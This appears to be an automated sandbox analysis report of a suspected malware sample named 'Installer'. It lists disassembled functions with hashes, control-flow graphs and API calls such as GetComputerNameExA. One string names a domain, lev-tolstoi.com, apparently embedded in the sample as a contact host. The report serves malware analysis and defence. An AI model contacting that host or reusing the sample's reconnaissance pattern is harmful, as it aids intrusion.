                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Uninitialize
                                                                                                                                                                                                                                                    • String ID: lev-tolstoi.com$x~
                                                                                                                                                                                                                                                    • API String ID: 3861434553-3419122072
                                                                                                                                                                                                                                                    • Opcode ID: e28907237b4d3a91ec5e118e2f9312d913e820380ba1de72427fa36cd9a4d49b
                                                                                                                                                                                                                                                    • Instruction ID: 6343ddfc659097a6b1acf70417bf2a81d4440c70e9b0de2d3dfcc7ed75506984
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e28907237b4d3a91ec5e118e2f9312d913e820380ba1de72427fa36cd9a4d49b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32B146B1A047808FD319CF2AC4E0663BFA2EF9730571981ADC8D65F79AC7399806CB55
                                                                                                                                                                                                                                                    Function 00410A57 Relevance: 2.4, APIs: 1, Instructions: 885COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bf30f5bda6a5b1f22e383a34f2d374bcf5c2a5ffd3afd8456c42b1e5df0951ff
                                                                                                                                                                                                                                                    • Instruction ID: 72290171dc64d7e4f27391859bf3f99b55d54925dc59b80e2ac98bdd845427b2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf30f5bda6a5b1f22e383a34f2d374bcf5c2a5ffd3afd8456c42b1e5df0951ff
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D472E575A04B408FD714DF38C5853AABBE2AF99314F088A3ED5EB87791D678E445CB02
                                                                                                                                                                                                                                                    Function 0043EBA0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LdrInitializeThunk.NTDLL(00441BF8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043EBCE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                    Function 0043F39E Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: d029721911ace6ae7146d635cd2610f792fc7e2dd43cd493b89f1baae024793e
                                                                                                                                                                                                                                                    • Instruction ID: ac99ad69f4e146c84b4f67b549d234f9fa435a805a225365c348144745e62db1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d029721911ace6ae7146d635cd2610f792fc7e2dd43cd493b89f1baae024793e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51BEB4D112159BEB14CF54C8907BFB7B2FFA9315F04612DD4416B3A0EB785C0A8B98
                                                                                                                                                                                                                                                    Function 00441DA0 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: 00ccdfaef0cf493359b405ba2665aa19c664aa536cebf78614738aaa438344e7
                                                                                                                                                                                                                                                    • Instruction ID: 65ca1ec6d4672f8839795e63c8614bf8e8fa17c57707b6a32643269015e7e6e9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00ccdfaef0cf493359b405ba2665aa19c664aa536cebf78614738aaa438344e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A4158B49083109BEB10CF24D88072BB7E1FF99368F24852DEA88573A1E7389D44C7C6
                                                                                                                                                                                                                                                    Function 00440CE0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: b277768eaef66f0637a864381fd791a7c7a7d3d97be0c2acc1eb4938501a7204
                                                                                                                                                                                                                                                    • Instruction ID: 9fac65509ee92f571f5b79e95c1ad94962471f478490a82abc777c74c6c74bd9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b277768eaef66f0637a864381fd791a7c7a7d3d97be0c2acc1eb4938501a7204
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A31EEB18083049BD314DF98D8C066BBBF5EB99314F14892DE79987280E335A818CB9A
                                                                                                                                                                                                                                                    Function 00440E00 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                    • Opcode ID: 9b8b0fe984b0c526368686a946928a16b95041f210f520b4daf9bb1128f79edd
                                                                                                                                                                                                                                                    • Instruction ID: c62094c7f2aec0b4591fe89b4ffec96fa28a786c068cd393fffb3f8dac1334b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b8b0fe984b0c526368686a946928a16b95041f210f520b4daf9bb1128f79edd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D7127756082419BEB24DF28C890A3FB3E2EFD9750F19C42EE68587365E73498609786
                                                                                                                                                                                                                                                    Function 00439490 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                    • Opcode ID: 76f77a49fba37e77a617a0d652d585f641a783687e7745c1783b0e6500cdef52
                                                                                                                                                                                                                                                    • Instruction ID: 6b3e4b7f11ac291a21e261308eef6cd7443abca3de393b842f6f559da3e6bac2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76f77a49fba37e77a617a0d652d585f641a783687e7745c1783b0e6500cdef52
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8051CE263492116BD7018B25CC81A7BB7EAE7DE360F14952EE5C083342C2BCDC82D79E
                                                                                                                                                                                                                                                    Function 0040B79B Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a5f67c24f99cd3bc66bd5b873502f9be22687b740bcac6bb5ea83f9132e44f2e
                                                                                                                                                                                                                                                    • Instruction ID: 006929160d69d297b0fade613808cb138237ee9c33cbc0bff183a40fe4272359
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5f67c24f99cd3bc66bd5b873502f9be22687b740bcac6bb5ea83f9132e44f2e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F024796093805BD348CF34DCE1A6BBBA6E792608F05653CE58293290CA21DC598A4D
                                                                                                                                                                                                                                                    Function 0042C3AE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1246 42c3ae-42c3b8 1247 42c3ba-42c3c1 1246->1247 1248 42c3db-42c42b FreeLibrary call 440690 1246->1248 1250 42c3d0-42c3d9 1247->1250 1254 42c430-42c45c 1248->1254 1250->1248 1250->1250 1254->1254 1255 42c45e-42c468 1254->1255 1256 42c46a-42c478 1255->1256 1257 42c48d 1255->1257 1258 42c480-42c489 1256->1258 1259 42c494-42c4cc GetComputerNameExA 1257->1259 1258->1258 1260 42c48b 1258->1260 1261 42c4cf 1259->1261 1260->1259 1261->1261
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0042C3E5
                                                                                                                                                                                                                                                    • GetComputerNameExA.KERNEL32(00000006,-!B,00000100), ref: 0042C4AD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                    • String ID: -!B$tidc
                                                                                                                                                                                                                                                    • API String ID: 2904949787-476040656
                                                                                                                                                                                                                                                    • Opcode ID: 57dd9652ca8a2e1dfdf703eb478245f04d1e764e2e6b3a4a6fe835d72092e874
                                                                                                                                                                                                                                                    • Instruction ID: 0cb94904c914ad7ae8bd8e1ac9fe588995fa1e3a88885b05c0f925f6698cc2a9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57dd9652ca8a2e1dfdf703eb478245f04d1e764e2e6b3a4a6fe835d72092e874
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E321F17420C3918AD7218F39D8507EBBBE6ABE6304F94885ED0C8C7292DA798506C716
                                                                                                                                                                                                                                                    Function 0042C3AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1262 42c3ac-42c42b FreeLibrary call 440690 1267 42c430-42c45c 1262->1267 1267->1267 1268 42c45e-42c468 1267->1268 1269 42c46a-42c478 1268->1269 1270 42c48d 1268->1270 1271 42c480-42c489 1269->1271 1272 42c494-42c4cc GetComputerNameExA 1270->1272 1271->1271 1273 42c48b 1271->1273 1274 42c4cf 1272->1274 1273->1272 1274->1274
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0042C3E5
                                                                                                                                                                                                                                                    • GetComputerNameExA.KERNEL32(00000006,-!B,00000100), ref: 0042C4AD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                    • String ID: -!B$tidc
                                                                                                                                                                                                                                                    • API String ID: 2904949787-476040656
                                                                                                                                                                                                                                                    • Opcode ID: 162db42e1e998b1f12c2b9f51427277601aaff401d5d9aca3582506ac13c7d85
                                                                                                                                                                                                                                                    • Instruction ID: 36f598f07a78be95229329e16d831615469c789e38aad443987067daf5129e6e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 162db42e1e998b1f12c2b9f51427277601aaff401d5d9aca3582506ac13c7d85
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 331136756083908BD720CF35E8407ABBBE6ABD6304F84846ED0C8C7261DF398405C706
                                                                                                                                                                                                                                                    Function 0040C5B6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1390 40c5b6-40c718 CoInitializeEx * 2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C5BA
                                                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C6FF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Initialize
                                                                                                                                                                                                                                                    • String ID: E)ov
                                                                                                                                                                                                                                                    • API String ID: 2538663250-3776031005
                                                                                                                                                                                                                                                    • Opcode ID: e7a95b8e5ff17603cc907fcbc2df53191815e2a062ed42e83665db1e0f35c6a2
                                                                                                                                                                                                                                                    • Instruction ID: 7eb1427ce90a185cc1fa67b5dec7511066f0963e0e52bfde8587bb9a189e8e04
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7a95b8e5ff17603cc907fcbc2df53191815e2a062ed42e83665db1e0f35c6a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6941C8B4C10B40AFD370EF39990B7137EB4AB06250F504B1DF9EA866D4E631A4198BD7
                                                                                                                                                                                                                                                    Function 0042C332 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1402 42c332-42c42b call 440690 1406 42c430-42c45c 1402->1406 1406->1406 1407 42c45e-42c468 1406->1407 1408 42c46a-42c478 1407->1408 1409 42c48d 1407->1409 1410 42c480-42c489 1408->1410 1411 42c494-42c4cc GetComputerNameExA 1409->1411 1410->1410 1412 42c48b 1410->1412 1413 42c4cf 1411->1413 1412->1411 1413->1413
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetComputerNameExA.KERNEL32(00000006,-!B,00000100), ref: 0042C4AD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ComputerName
                                                                                                                                                                                                                                                    • String ID: -!B$tidc
                                                                                                                                                                                                                                                    • API String ID: 3545744682-476040656
                                                                                                                                                                                                                                                    • Opcode ID: 61886e391caa53043cf8b7eeebbfdde2549436c7387b1184654fa6bc82ce0717
                                                                                                                                                                                                                                                    • Instruction ID: cb59f9437d4d6314ce5892b09104ceaf55f68d0d243f063b9a53ef71cd653c73
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61886e391caa53043cf8b7eeebbfdde2549436c7387b1184654fa6bc82ce0717
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA11037561C390CBD721CF35D8907EBB7E6ABDA304F94886EC0C8C7255EE7985068716
                                                                                                                                                                                                                                                    Function 0042C4DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetComputerNameExA.KERNEL32(00000005,?,00000100), ref: 0042C594
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ComputerName
                                                                                                                                                                                                                                                    • String ID: /CWl$m
                                                                                                                                                                                                                                                    • API String ID: 3545744682-3646203745
                                                                                                                                                                                                                                                    • Opcode ID: 7a167722f522b369fb5a67656a2b11fc2d91befdf65f4b5365c50abbd1630efa
                                                                                                                                                                                                                                                    • Instruction ID: 03530a0ce53fbf409c5d07d4627929f5f9734d687145533c51ec677908ed519b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a167722f522b369fb5a67656a2b11fc2d91befdf65f4b5365c50abbd1630efa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19119D3010C7E19ADB319B3894687FBBBE4AF97300F5809ADC0CDC7292D77894458B96
                                                                                                                                                                                                                                                    Function 0042C4D1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetComputerNameExA.KERNEL32(00000005,?,00000100), ref: 0042C594
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ComputerName
                                                                                                                                                                                                                                                    • String ID: /CWl$m
                                                                                                                                                                                                                                                    • API String ID: 3545744682-3646203745
                                                                                                                                                                                                                                                    • Opcode ID: 949d0f20e82d11914490ce482742be9fe114ad8304adfa35962e6676036ca1e9
                                                                                                                                                                                                                                                    • Instruction ID: e0895b3182d1dc6c25a11d8008f41e73b737397a8b3a12be8f13edf20661ff36
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 949d0f20e82d11914490ce482742be9fe114ad8304adfa35962e6676036ca1e9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1201807010C7E18BDB319B34A8687FBB7E4AB96310F28096DC0CDC7291D77494459B56
                                                                                                                                                                                                                                                    Function 0043ECE8 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043ED37
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ForegroundWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2020703349-0
                                                                                                                                                                                                                                                    • Opcode ID: a5036223926f76e7a30bb82d8b41372fba638fb8ce1a419d4bb5bda1a50e89be
                                                                                                                                                                                                                                                    • Instruction ID: c78e23977c3e2a35fed25d62a8fd294347c45f883251edd20cfe32e08262873d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5036223926f76e7a30bb82d8b41372fba638fb8ce1a419d4bb5bda1a50e89be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFF0E2B09445D48BDB00CF7AAC593AA37A0EB56305F241975E112D72A1EB3898528B0D
                                                                                                                                                                                                                                                    Function 0043EB40 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B2E9,?,00000001), ref: 0043EB72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: cfbf4a6718c87aec0984e55126ec68d7d5da04f3355e97993dcb15881ca12bd3
                                                                                                                                                                                                                                                    • Instruction ID: f8d085a32fc5b2999584d7c69e937369889b9cf04708eea92d38761de7c40dc4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfbf4a6718c87aec0984e55126ec68d7d5da04f3355e97993dcb15881ca12bd3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDE02B72905210EBD301AF357C06F177A64AFCA715F050C36F505E2152D638F81196AF
                                                                                                                                                                                                                                                    Function 00431FE2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BlanketProxy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3890896728-0
                                                                                                                                                                                                                                                    • Opcode ID: 0601404d5c011c4097f442398f72a59a3fcd5b637d74b6bd99cb2993c6c4fcc6
                                                                                                                                                                                                                                                    • Instruction ID: f5617d7eab011253af39c7223b5d4b47f89a1495823ff6e5c490b642b0bf52d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0601404d5c011c4097f442398f72a59a3fcd5b637d74b6bd99cb2993c6c4fcc6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94F067B4508701CFD714DF29D5A871BBBF0FB84304F11891DE4999B290C7B9A958CF82
